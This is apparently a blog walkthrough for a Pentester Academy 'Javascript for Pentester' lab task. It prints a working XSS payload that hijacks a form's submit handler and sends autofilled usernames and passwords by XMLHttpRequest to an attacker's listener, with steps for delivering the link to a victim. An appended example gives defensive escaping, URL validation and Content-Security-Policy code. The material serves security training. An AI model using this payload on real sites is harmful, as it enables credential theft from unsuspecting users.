Javascript for Pentester Task 13

Hello Pentesters, today I am going to post another solution to a task from Javascript for Pentester at Pentester Academy. This task is the same as task 12: you will learn how to grab the values a browser autofills into a website's form if the site is vulnerable to XSS. Modern web browsers do not seem to autofill usernames and passwords, so you may have to try an old browser for this task. You can view solutions to the other tasks here.

Task 13: Posting with XMLHttpRequest | Task Link

Provided that the “url” parameter of the URL is vulnerable to XSS injection, we can verify it by trying some injections on it. This task is the same as task 12, but here we have to do it with an XMLHttpRequest.

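<script>
// Attach a handler to the first form on the page; submit() runs when it is submitted.
var formcon = document.forms[0];
formcon.onsubmit = submit;

function submit()
{
    // Read the first two form fields (username and password).
    var un = formcon.elements[0].value;
    var up = formcon.elements[1].value;
    // Send both values as query parameters in an asynchronous GET request.
    var req = new XMLHttpRequest();
    req.open('GET','http://localhost:8000/f?'+'username='+un+'&password='+up,true);
    req.send();
    // Cancel the normal form submission.
    return false;
}
</script>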

For this, we first have to set up a simple HTTP server in Python to capture the request made by the XMLHttpRequest method. Copy and URL-encode the code, paste it after the ’url’ parameter on the same page, and send it to your victim. When the victim opens the link, the username and password filled in by autofill will be sent to the attacker's machine via the XMLHttpRequest.

That’s all. Refer to this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided on the Pentester Academy website.
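
The defender's side of this task, as an added example that is not part of the original post or the lab's code: server-side handling that keeps a reflected `url` parameter from becoming markup, plus a Content-Security-Policy that stops an injected inline script from running or sending an XMLHttpRequest to another origin. It assumes the value is reflected into HTML text or a quoted attribute; all function names are hypothetical.

```javascript
// Added example (Node.js); names and policy are assumptions, not the lab's code.

// Characters that can break out of HTML text or a quoted attribute.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Accept only absolute http(s) URLs; markup, javascript: and data: are rejected.
function parseHttpUrl(raw) {
  let parsed;
  try {
    parsed = new URL(raw);
  } catch (err) {
    return null; // not a URL at all, e.g. a bare <script> block
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:' ? parsed : null;
}

// Returns the string that is safe to reflect into the page,
// or null when the request should be refused (for example with HTTP 400).
function safeReflectedUrl(raw) {
  const parsed = parseHttpUrl(raw);
  return parsed ? escapeHtml(parsed.href) : null;
}

// Value for the Content-Security-Policy response header (second layer of defence).
function contentSecurityPolicy() {
  return [
    "default-src 'self'",
    "script-src 'self'",  // no 'unsafe-inline': injected <script> blocks do not execute
    "connect-src 'self'", // XMLHttpRequest and fetch may only reach the page's own origin
    "form-action 'self'", // forms may only submit to the page's own origin
  ].join('; ');
}
```

With `connect-src 'self'` in place, a request to a different origin such as the `http://localhost:8000` listener used in this task is blocked by the browser and reported as a CSP violation, which is also a useful detection signal.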